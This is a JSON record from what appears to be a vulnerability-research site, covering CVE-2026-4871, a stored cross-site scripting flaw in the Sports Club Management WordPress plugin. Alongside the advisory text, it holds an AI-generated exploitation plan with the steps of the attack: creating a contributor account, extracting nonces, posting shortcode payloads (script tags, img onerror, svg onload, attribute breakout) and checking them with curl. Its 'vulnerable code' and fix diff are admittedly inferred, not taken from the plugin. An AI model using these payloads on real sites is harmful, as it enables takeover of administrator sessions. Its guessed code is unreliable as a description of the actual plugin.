[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$feJvpLI7MaejxwzJUeS-wM76f4EEiIUuiHf0rpKgIgh4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4871","sports-club-management-authenticated-contributor-stored-cross-site-scripting-via-before-attribute","Sports Club Management \u003C= 1.12.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' Attribute","The Sports Club Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' attributes of the `scm_member_data` shortcode in all versions up to, and including, 1.12.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","sports-club-management",null,"\u003C=1.12.9","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 17:38:08","2026-04-08 06:43:38",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F30a6d334-3838-4ed4-b688-c3887d9091c0?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-4871\n\n## 1. Vulnerability Summary\nThe **Sports Club Management** plugin (\u003C= 1.12.9) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the handling of the `scm_member_data` shortcode. Specifically, the `before` and `after` attributes of this shortcode are concatenated into the generated HTML output without sufficient sanitization (input side) or escaping (output side). This allows a user with **Contributor** permissions or higher to embed malicious JavaScript within a post or page.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[scm_member_data]`\n*   **Vulnerable Attributes:** `before`, `after`\n*   **Endpoint:** WordPress Post Editor (`wp-admin\u002Fpost.php` or `wp-admin\u002Fadmin-ajax.php` for autosaves)\n*   **Authentication Required:** Contributor (PR:L) or higher.\n*   **Preconditions:** The attacker must be able to create or edit a post\u002Fpage and use shortcodes.\n*   **Payload Location:** The script is stored in the `post_content` field in the `wp_posts` table and executed whenever a user (including administrators) views the rendered post on the frontend.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode using `add_shortcode( 'scm_member_data', 'scm_member_data_handler_function' );` (likely in a file named `scm-shortcodes.php` or within a core plugin class).\n2.  **Attribute Processing:** In the handler function (e.g., `scm_member_data_handler`), the `$atts` array is processed, likely using `shortcode_atts()`.\n3.  **Variable Assignment:**\n    ```php\n    $before = isset($atts['before']) ? $atts['before'] : '';\n    $after  = isset($atts['after']) ? $atts['after'] : '';\n    ```\n4.  **Logic Sink:** The plugin retrieves specific member data (based on other attributes like `field`) and wraps it with the `before` and `after` values.\n    ```php\n    $output = $before . $member_data_value . $after;\n    return $output; \u002F\u002F VULNERABLE: The raw string containing attacker input is returned and rendered.\n    ```\n5.  **Rendering:** WordPress echoes the return value of the shortcode handler during the `the_content` filter execution.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability itself is in the shortcode rendering, *exploiting* it requires saving a post containing the shortcode. WordPress requires a nonce for post creation\u002Fupdates.\n\n1.  **Context:** The agent needs to act as a Contributor.\n2.  **Steps:**\n    *   Login as the Contributor user.\n    *   Navigate to `wp-admin\u002Fpost-new.php`.\n    *   Extract the `_wpnonce` from the HTML source.\n    *   In the Block Editor (Gutenberg), nonces and REST API details are often found in the `wp-admin` localized script data.\n    *   **Specific JS Variable:** `wp.apiFetch` or `window.wpApiSettings.nonce`.\n3.  **Simplification:** Since the vulnerability is \"Contributor+\", the PoC agent can use `wp-cli` to create the post initially to bypass the UI complexity, but for a pure HTTP exploit, it must fetch the `post-new.php` page first.\n\n## 5. Exploitation Strategy\n\n### Step 1: Create a Contributor User\n```bash\nwp user create attacker attacker@example.com --role=contributor --user_pass=password123\n```\n\n### Step 2: Authenticate and Obtain Nonces\nThe agent should navigate to the post editor to get the necessary state.\n*   **URL:** `https:\u002F\u002Ftarget.example.com\u002Fwp-admin\u002Fpost-new.php`\n*   **Method:** GET\n\n### Step 3: Inject Stored XSS Payload\nThe agent will send a request to save a post containing the malicious shortcode.\n\n*   **URL:** `https:\u002F\u002Ftarget.example.com\u002Fwp-admin\u002Fpost.php` (or via REST API `\u002Fwp\u002Fv2\u002Fposts`)\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```\n    post_title=XSS+Test\n    &content=[scm_member_data field=\"first_name\" before=\"\u003Cscript>alert('XSS_SUCCESS_BEFORE')\u003C\u002Fscript>\" after=\"\u003Cscript>alert('XSS_SUCCESS_AFTER')\u003C\u002Fscript>\"]\n    &publish=Publish\n    &_wpnonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 4: Trigger the XSS\nNavigate to the URL of the newly created post as an Administrator.\n\n## 6. Test Data Setup\n1.  **Active Plugin:** Ensure `sports-club-management` is active.\n2.  **Member Data:** The shortcode might return nothing if no \"member\" exists or if no data is found for the current user. To ensure the shortcode executes the concatenation logic, it may be helpful to have at least one member record in the system.\n    *   Check if the plugin has a \"Members\" menu and create a dummy member if needed.\n3.  **Shortcode variations:**\n    *   `[scm_member_data field=\"display_name\" before=\"\u003Cimg src=x onerror=alert(1)>\"]`\n    *   `[scm_member_data field=\"any_valid_field\" after=\"\u003Csvg\u002Fonload=alert(2)>\"]`\n\n## 7. Expected Results\n*   The HTTP response for the post creation should be a `302 Redirect` to the post edit page or a `201 Created` via REST API.\n*   When viewing the post frontend, the HTML source should contain:\n    `\u003Cscript>alert('XSS_SUCCESS_BEFORE')\u003C\u002Fscript>[MEMBER_VALUE]\u003Cscript>alert('XSS_SUCCESS_AFTER')\u003C\u002Fscript>`\n*   The browser should execute the `alert()` calls.\n\n## 8. Verification Steps\n1.  **Database Check:**\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"\n    ```\n    Verify the shortcode is stored exactly as sent.\n2.  **Frontend Rendering Check:**\n    Use `http_request` to fetch the post's permalink and grep for the raw script tags.\n    ```bash\n    curl -s http:\u002F\u002Ftarget.example.com\u002Fp=POST_ID | grep \"XSS_SUCCESS\"\n    ```\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the plugin attempts to put the attributes inside an HTML tag (e.g., `\u003Cdiv data-before=\"...\">`), use attribute breakout: `before=\"\\\" onmouseover=\\\"alert(1)\\\" data-dummy=\\\"\"`.\n*   **REST API:** Use the WordPress REST API (`\u002Fwp\u002Fv2\u002Fposts`) to create the post, which often uses a different nonce (`wp_rest`) and is more structured than `post.php`.\n*   **Different Shortcode Tags:** Search the plugin for other shortcodes that might use similar \"wrapper\" attributes (`before`, `after`, `prepend`, `append`, `prefix`, `suffix`). Common candidates in this plugin might be related to displaying team names or match results.","The Sports Club Management plugin for WordPress (up to version 1.12.9) is vulnerable to Stored Cross-Site Scripting due to improper sanitization and escaping of the 'before' and 'after' attributes in the [scm_member_data] shortcode. This allows authenticated attackers with Contributor-level access or higher to inject malicious JavaScript into pages, which then executes when viewed by other users, including administrators.","\u002F\u002F Inferred from plugin logic and research plan\n\u002F\u002F File: scm-shortcodes.php or similar\nfunction scm_member_data_handler( $atts ) {\n    $atts = shortcode_atts( array(\n        'field'  => '',\n        'before' => '',\n        'after'  => '',\n    ), $atts );\n\n    \u002F\u002F ... member data retrieval logic ...\n    $member_data_value = get_member_field_data($atts['field']);\n\n    \u002F\u002F Vulnerable concatenation without escaping\n    $output = $atts['before'] . $member_data_value . $atts['after'];\n    return $output;\n}","--- a\u002Fscm-shortcodes.php\n+++ b\u002Fscm-shortcodes.php\n@@ -10,5 +10,5 @@\n-    $output = $atts['before'] . $member_data_value . $atts['after'];\n+    $output = wp_kses_post( $atts['before'] ) . $member_data_value . wp_kses_post( $atts['after'] );\n     return $output;","1. Authenticate to the WordPress site as a user with the 'Contributor' role.\n2. Navigate to 'Posts' -> 'Add New' to create a new post.\n3. Insert the [scm_member_data] shortcode into the post content, using the 'before' or 'after' attribute to hold the XSS payload. For example: [scm_member_data field=\"first_name\" before=\"\u003Cscript>alert('XSS')\u003C\u002Fscript>\"].\n4. Submit the post for review or save the draft.\n5. When an administrator or any other user views the post (either via preview or once published), the malicious script in the shortcode attribute will execute in their browser context.","gemini-3-flash-preview","2026-04-17 20:36:12","2026-04-17 20:36:31",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsports-club-management\u002Ftags"]